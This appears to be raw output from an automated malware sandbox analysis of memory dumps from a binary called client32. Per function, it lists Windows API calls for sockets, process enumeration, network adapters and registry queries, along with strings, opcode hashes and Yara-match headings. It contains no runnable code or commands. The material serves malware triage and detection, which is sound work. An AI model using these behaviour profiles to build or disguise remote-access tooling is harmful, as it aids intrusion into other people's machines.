                                                                                                                  • Instruction ID: 89832f748e922a403c2406022f27e5a031cf170e04c986d8c3432455018c83f9
                                                                                                                  • Opcode Fuzzy Hash: b039da78e7f60a0956db5c69d50db6548e5713577cffa5e4926f0cc6d21667ef
                                                                                                                  • Instruction Fuzzy Hash: 1E41C479E1465AAFCB01DFA59C84EEFFBB5AF04358B404526F905E7640EA30A900CBA1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • ioctlsocket.WSOCK32 ref: 6BEB7642
                                                                                                                  • connect.WSOCK32(00000000,?,?), ref: 6BEB7659
                                                                                                                  • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6BEB7660
                                                                                                                  • _memmove.LIBCMT ref: 6BEB76D3
                                                                                                                  • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6BEB76F3
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEB7717
                                                                                                                  • ioctlsocket.WSOCK32 ref: 6BEB775C
                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEB7762
                                                                                                                  • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6BEB777A
                                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6BEB778B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                                  • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                                  • API String ID: 4218156244-2969206566
                                                                                                                  • Opcode ID: e420b3a77f5de270d5597e6c5442d3f9017c8347465d2798473ecbfdcf46e71d
                                                                                                                  • Instruction ID: f34da31523b48dd708e0b03e547938217dd804416fc6697e07e87f89583b775b
                                                                                                                  • Opcode Fuzzy Hash: e420b3a77f5de270d5597e6c5442d3f9017c8347465d2798473ecbfdcf46e71d
                                                                                                                  • Instruction Fuzzy Hash: 0641DD71D003249BE720DBB4CD49BDE73BAAF44309F2045DDE50997141EBBC9A56CBA2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 111417E0: _memset.LIBCMT ref: 11141825
                                                                                                                    • Part of subcall function 111417E0: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114183E
                                                                                                                    • Part of subcall function 111417E0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141865
                                                                                                                    • Part of subcall function 111417E0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141877
                                                                                                                    • Part of subcall function 111417E0: FreeLibrary.KERNEL32(00000000), ref: 1114188F
                                                                                                                    • Part of subcall function 111417E0: GetSystemDefaultLangID.KERNEL32 ref: 1114189A
                                                                                                                  • AdjustWindowRectEx.USER32(1113DB48,00CE0000,00000001,00000001), ref: 111313B7
                                                                                                                  • LoadMenuA.USER32(00000000,000003EC), ref: 111313C8
                                                                                                                  • GetSystemMetrics.USER32(00000021), ref: 111313D9
                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 111313E1
                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 111313E7
                                                                                                                  • GetDC.USER32(00000000), ref: 111313F3
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 111313FE
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 1113140A
                                                                                                                  • CreateWindowExA.USER32(00000001,NSMWClass,02712B00,00CE0000,80000000,80000000,1113DB48,?,00000000,?,11000000,00000000), ref: 1113145F
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,110F5809,00000001,1113DB48,_debug), ref: 11131467
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                                  • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                  • API String ID: 1594747848-1114959992
                                                                                                                  • Opcode ID: 7281dd7751e614175c8dce41f6d5c7d8aafef09e31021395c24f009c96aa77ba
                                                                                                                  • Instruction ID: 9cc38207800c48755d7f962ceed396d8e742c52f1043c8e55726c054ea069f44
                                                                                                                  • Opcode Fuzzy Hash: 7281dd7751e614175c8dce41f6d5c7d8aafef09e31021395c24f009c96aa77ba
                                                                                                                  • Instruction Fuzzy Hash: 6C31A072E00319AFDB109FE58C84BBFFBB8EB48719F104528FA11B7284D67069408BA5
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6BEC67B5), ref: 6BEB8D6B
                                                                                                                    • Part of subcall function 6BEB4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6BEB8DC8), ref: 6BEB4F78
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 6BEB8DCB
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6BEB8DD8
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 6BEB8EBF
                                                                                                                    • Part of subcall function 6BEB4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6BEB4FC4
                                                                                                                    • Part of subcall function 6BEB4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6BEB8E0D,00000000,?,6BEB8E0D,00000000,?,00000FA0,?), ref: 6BEB4FE4
                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6BEB8EAE
                                                                                                                    • Part of subcall function 6BEB5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6BEB5014
                                                                                                                    • Part of subcall function 6BEB5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6BEB8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6BEB5034
                                                                                                                    • Part of subcall function 6BEB2420: _strrchr.LIBCMT ref: 6BEB242E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$AddressFileLibraryModuleNameProc$ChangeCloseCurrentEnumFindFreeLoadModulesNotificationOpen_strrchr
                                                                                                                  • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                                  • API String ID: 3028219403-3484705551
                                                                                                                  • Opcode ID: 2ee0beee34eeb8a9373904579fbd7e9e541ecbcc53ac8a382814bea10526b5f7
                                                                                                                  • Instruction ID: f0e9b147733a6c4959afcbeada5d72692648356fb245c2fc2bc5e2866b6aa221
                                                                                                                  • Opcode Fuzzy Hash: 2ee0beee34eeb8a9373904579fbd7e9e541ecbcc53ac8a382814bea10526b5f7
                                                                                                                  • Instruction Fuzzy Hash: C041CA71E002199BDB10CB61ED45FEA77BCEF95709F200499EA15A3340E778EA45CF61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
                                                                                                                    • Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
                                                                                                                    • Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507
                                                                                                                  • std::exception::exception.LIBCMT ref: 1110D1EA
                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 1110D1FF
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1110D216
                                                                                                                  • InitializeCriticalSection.KERNEL32(-00000010,?,110309CC,00000001,00000000), ref: 1110D229
                                                                                                                  • InitializeCriticalSection.KERNEL32(111EB8A0,?,110309CC,00000001,00000000), ref: 1110D238
                                                                                                                  • EnterCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D24C
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,110309CC), ref: 1110D272
                                                                                                                  • LeaveCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D2FF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                  • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                  • API String ID: 1976012330-1024648535
                                                                                                                  • Opcode ID: a9464cb0e0a99456cff2a8d3bc78cbc6792874f259f81f545d4ceebd7879f5bc
                                                                                                                  • Instruction ID: 3950031055ca146543af7cdf1b279fa91d633e3444a8efa468e47cc8be7809bd
                                                                                                                  • Opcode Fuzzy Hash: a9464cb0e0a99456cff2a8d3bc78cbc6792874f259f81f545d4ceebd7879f5bc
                                                                                                                  • Instruction Fuzzy Hash: DD41CFB4E01215AFDB12CFA98C84FAEFBF4FB48708F54853AE419D7344E635A5008BA1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • _calloc.LIBCMT ref: 6BEC2FBB
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC300D
                                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 6BEC301B
                                                                                                                  • _calloc.LIBCMT ref: 6BEC303B
                                                                                                                  • _memmove.LIBCMT ref: 6BEC3049
                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 6BEC307F
                                                                                                                  • SetEvent.KERNEL32(00000314,?,?,?,?,?,?,?,?,?,?,?,?,?,?,941034B3), ref: 6BEC308C
                                                                                                                    • Part of subcall function 6BEC28D0: wsprintfA.USER32 ref: 6BEC2965
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                                  • String ID: a3k$a3k
                                                                                                                  • API String ID: 3178096747-2515680799
                                                                                                                  • Opcode ID: 591d586ace468c367697f2cfdcd8f3c02fdce152b0cab662d0af8d0068fcdcab
                                                                                                                  • Instruction ID: 3807391ab35f485629c3deb8ea17ecd92db2b1a725aef5c00513f3bf6688aabe
                                                                                                                  • Opcode Fuzzy Hash: 591d586ace468c367697f2cfdcd8f3c02fdce152b0cab662d0af8d0068fcdcab
                                                                                                                  • Instruction Fuzzy Hash: 554185B6C00209AFDB50CFB8D945AEFB7BCEB88304F108559E516E7241E7749605CBA1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6BED0F2B,4CBAF0D2,00000000,?,?,6BEEF278,000000FF,?,6BEBAE0A,?,00000000,?,00000080), ref: 6BED0D48
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6BED0D5B
                                                                                                                  • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6BEFCB4C,?,?,6BEEF278,000000FF,?,6BEBAE0A,?,00000000,?,00000080), ref: 6BED0D76
                                                                                                                  • _malloc.LIBCMT ref: 6BED0D8C
                                                                                                                    • Part of subcall function 6BED1B69: __FF_MSGBANNER.LIBCMT ref: 6BED1B82
                                                                                                                    • Part of subcall function 6BED1B69: __NMSG_WRITE.LIBCMT ref: 6BED1B89
                                                                                                                    • Part of subcall function 6BED1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BEDD3C1,6BED6E81,00000001,6BED6E81,?,6BEDF447,00000018,6BEF7738,0000000C,6BEDF4D7), ref: 6BED1BAE
                                                                                                                  • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6BEEF278,000000FF,?,6BEBAE0A,?,00000000,?), ref: 6BED0D9F
                                                                                                                  • _free.LIBCMT ref: 6BED0D84
                                                                                                                    • Part of subcall function 6BED1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6BED1C13
                                                                                                                    • Part of subcall function 6BED1BFD: GetLastError.KERNEL32(00000000), ref: 6BED1C25
                                                                                                                  • _free.LIBCMT ref: 6BED0DAF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                                  • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                                  • API String ID: 1360380336-1843585929
                                                                                                                  • Opcode ID: 86c502fddac31bcfc057399a623715ecc8710b76d9cd425ce60f64d457f1d860
                                                                                                                  • Instruction ID: eef3d05b35a42cc95b830bf58c1e45e3952d1bcc564c4db35d518cffa8cb235c
                                                                                                                  • Opcode Fuzzy Hash: 86c502fddac31bcfc057399a623715ecc8710b76d9cd425ce60f64d457f1d860
                                                                                                                  • Instruction Fuzzy Hash: C401DFB5200301ABE7308B709C95F5777ACAF80B08F24491DF956CF281EAB9F442C721
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • wsprintfA.USER32 ref: 110152DA
                                                                                                                  • _memset.LIBCMT ref: 1101531E
                                                                                                                  • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015358
                                                                                                                  Strings
                                                                                                                  • NSLSP, xrefs: 11015368
                                                                                                                  • PackedCatalogItem, xrefs: 11015342
                                                                                                                  • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101525B
                                                                                                                  • %012d, xrefs: 110152D4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue_memsetwsprintf
                                                                                                                  • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                  • API String ID: 1333399081-1346142259
                                                                                                                  • Opcode ID: 1966d73d0a7548c662ec7d0f5b9b12a1528b40116bf1a80f5935ba8defee945b
                                                                                                                  • Instruction ID: bdea00c4cadcb984d55cc41d8ffa963856162fa43bf7957b15c91c952cfd9536
                                                                                                                  • Opcode Fuzzy Hash: 1966d73d0a7548c662ec7d0f5b9b12a1528b40116bf1a80f5935ba8defee945b
                                                                                                                  • Instruction Fuzzy Hash: 31419071D022299FEB11DB54CC80BEEF7B8EB05318F4441E8E41AA7281EB346B44CF50
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6950
                                                                                                                    • Part of subcall function 6BEC7BE0: _memset.LIBCMT ref: 6BEC7BFF
                                                                                                                    • Part of subcall function 6BEC7BE0: _strncpy.LIBCMT ref: 6BEC7C0B
                                                                                                                    • Part of subcall function 6BEBA4E0: EnterCriticalSection.KERNEL32(6BEFB898,00000000,?,?,?,6BEBDA7F,?,00000000), ref: 6BEBA503
                                                                                                                    • Part of subcall function 6BEBA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6BEBA568
                                                                                                                    • Part of subcall function 6BEBA4E0: Sleep.KERNEL32(00000000,?,6BEBDA7F,?,00000000), ref: 6BEBA581
                                                                                                                    • Part of subcall function 6BEBA4E0: LeaveCriticalSection.KERNEL32(6BEFB898,00000000), ref: 6BEBA5B3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                                  • String ID: 1.2$Blk$Channel$Client$Publish %d pending services
                                                                                                                  • API String ID: 1112461860-3612439952
                                                                                                                  • Opcode ID: 2b79487b3e47a0329fc56a8d8006b5d368937a494f69f7d0e8676d3b804f692a
                                                                                                                  • Instruction ID: 65f5b46d4a2e610a537153b6aceacf047c30b95273e9d775dd2a551a0c7a8c6f
                                                                                                                  • Opcode Fuzzy Hash: 2b79487b3e47a0329fc56a8d8006b5d368937a494f69f7d0e8676d3b804f692a
                                                                                                                  • Instruction Fuzzy Hash: D851A131B042099FDF10CF78EA51BAB77A8AB8630CF304569D86283381DB3DE455CB92
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(00000308,000000FF), ref: 1101758C
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 11017595
                                                                                                                  • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 110175BC
                                                                                                                  • CoUninitialize.OLE32 ref: 11017620
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                  • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                  • API String ID: 2407233060-578995875
                                                                                                                  • Opcode ID: 572f52470f95a4d3f25bfac9a72a5a8fb57ea990918a4877c824122c431ef828
                                                                                                                  • Instruction ID: f5474d2ce38f90e0a7ff94217669a9bd078e6126dc5b2c5f9befb888d677ae11
                                                                                                                  • Opcode Fuzzy Hash: 572f52470f95a4d3f25bfac9a72a5a8fb57ea990918a4877c824122c431ef828
                                                                                                                  • Instruction Fuzzy Hash: C1214CB5E006625BDB50CF648C44B6FBBE48F88348F0004B9FC5DDA188FA78D940C792
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • send.WSOCK32(?,?,?,00000000), ref: 6BEB9C93
                                                                                                                  • timeGetTime.WINMM(?,?,?,00000000), ref: 6BEB9CD0
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 6BEB9CDE
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6BEB9D4F
                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 6BEB9D72
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                                                  • String ID: 3'
                                                                                                                  • API String ID: 77915721-280543908
                                                                                                                  • Opcode ID: 0df89f4622c1feae28fec625842fab3b112143f8e6bbad66e16a7603bcc14c16
                                                                                                                  • Instruction ID: d9fbc713d6f776f447a109d827fee70a99ac7dba1baf06314e76d32c6e87e379
                                                                                                                  • Opcode Fuzzy Hash: 0df89f4622c1feae28fec625842fab3b112143f8e6bbad66e16a7603bcc14c16
                                                                                                                  • Instruction Fuzzy Hash: BF218179A041288FDB20CF64CD89B9AB7B4AF55314F2182D9D90D97382CB38DD95CF91
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wsprintf
                                                                                                                  • String ID: %s%s%s.bin$494126$_HF$_HW$_SW
                                                                                                                  • API String ID: 2111968516-430959295
                                                                                                                  • Opcode ID: 3cadedcaca85c7d32890df03e09b4770c2ac2c560999f8ab1a4eafac2d3aae07
                                                                                                                  • Instruction ID: 2d37ec8be248a08c2e3c36772f725827158d619cf10ab6990a6c8ba6e6d701e2
                                                                                                                  • Opcode Fuzzy Hash: 3cadedcaca85c7d32890df03e09b4770c2ac2c560999f8ab1a4eafac2d3aae07
                                                                                                                  • Instruction Fuzzy Hash: 93E09B60D2060C7FF30065588C057AFBB9C1F4931AF40C0E0FEE997A82E93494404A92
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6BEB5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6BEB5014
                                                                                                                    • Part of subcall function 6BEB5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6BEB8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6BEB5034
                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6BEB8EAE
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 6BEB8EBF
                                                                                                                    • Part of subcall function 6BEB2420: _strrchr.LIBCMT ref: 6BEB242E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressChangeCloseFileFindFreeLibraryModuleNameNotificationProc_strrchr
                                                                                                                  • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                                                  • API String ID: 4066820201-3459472706
                                                                                                                  • Opcode ID: a836fa05992079e2aade00061fd7acdd415920f00596d5df5fd9903d66d1531b
                                                                                                                  • Instruction ID: fe5e83426ff630d9449c501ae12b8df4e1f6f54d663ee0ec9b11f9dd381ae211
                                                                                                                  • Opcode Fuzzy Hash: a836fa05992079e2aade00061fd7acdd415920f00596d5df5fd9903d66d1531b
                                                                                                                  • Instruction Fuzzy Hash: 5211CB71B0011A9BEF148BA1ED51FEE7368AF55305F100499EE09E3340EB78D945CB61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 1114310F
                                                                                                                  • wsprintfA.USER32 ref: 11143146
                                                                                                                    • Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
                                                                                                                    • Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
                                                                                                                    • Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
                                                                                                                    • Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                  • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • wsprintfA.USER32 ref: 110312B6
                                                                                                                    • Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
                                                                                                                    • Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
                                                                                                                    • Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
                                                                                                                    • Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                  • String ID: %s%s.bin$494126$clientinv.cpp$m_pDoInv == NULL
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110C55B,754D8400,?), ref: 1113F667
                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F687
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1113F68F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile$CloseHandle
                                                                                                                  • String ID: "
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6BEB4FC4
                                                                                                                  • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6BEB8E0D,00000000,?,6BEB8E0D,00000000,?,00000FA0,?), ref: 6BEB4FE4
                                                                                                                  • SetLastError.KERNEL32(00000078,00000000,?,6BEB8E0D,00000000,?,00000FA0,?), ref: 6BEB4FED
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                                  • String ID: EnumProcessModules
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6BEB5014
                                                                                                                  • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6BEB8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6BEB5034
                                                                                                                  • SetLastError.KERNEL32(00000078,00000000,?,6BEB8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6BEB503D
